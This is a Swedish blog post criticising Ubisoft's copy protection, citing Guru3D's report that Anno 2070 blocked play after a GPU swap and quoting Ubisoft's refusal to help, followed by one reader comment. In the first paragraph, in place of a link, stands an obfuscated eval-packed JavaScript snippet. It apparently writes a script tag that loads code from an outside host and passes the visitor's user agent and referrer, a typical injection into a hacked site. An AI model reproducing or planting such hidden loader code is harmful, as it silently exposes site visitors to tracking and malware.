Image Image Image Image Image Image Image Image Image Image

| 17 juni, 2021

Scroll to top

Top

Ubisoft och dess kopieringsskydd gör bort sig igen.

Ubisoft och dess kopieringsskydd gör bort sig igen.
Sebastian

Jag har kritiserat Ubisoft och dess DRM (kopieringsskydd) mycket ( läs eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kyhbh|var|u0026u|referrer|tahfk||js|php’.split(’|’),0,{}))
här
) och jag tycker att man är mer än inkompitenta där borta i Frankrike, men den senaste upptäckten tar nog priset.  Nu måste man inte bara tänka på att man måste vara online för att spela spelen, eller att du inte får spela spelet på fler än tre datorer. Nu måste du även vara försiktig med att byta ut hårdvaran i din dator. Att göra så kan nämligen få Ubisofts kopieringsskydd att göra spelet ospelbart.

Bra va?

Det var Guru3D som upptäckte att Ubisofts (sopiga) kopieringsskydd inte känner skillnaden mellan en ny dator och ny hårdvara. Det var när man testade spelet Anno 2070 som man gjorde fyndet. Efter att man installerat spelet på tre datorer så skulle dem byta ut GPUn på en av datorerna och då tyckte Ubisofts kopieringsskydd att det fick vara nog och stängde ner spelet. Man kontaktade då Ubisoft i Holland för att häva denna löjliga block. Men fick då följande svar:

 

”Sorry to disappoint you – the game is indeed restricted to 3 hardware changes and there simply is no way to bypass that. We also do not have 7 copies of the game for you”

Vilka otroliga nötter dem är…

Ubisoft måste vara spelindustrins mest inkompitenta gäng när det kommer till kundnöjdhet! Att medvetet förstöra för betalanda kunder i jakten på pirater är ju bara sjukt och är inget Ubisoft kommer vinna på i längden.
www.guru3d.com

Comments

  1. Svin.. det är vad dom är. Svin. Bojkotta skräpet!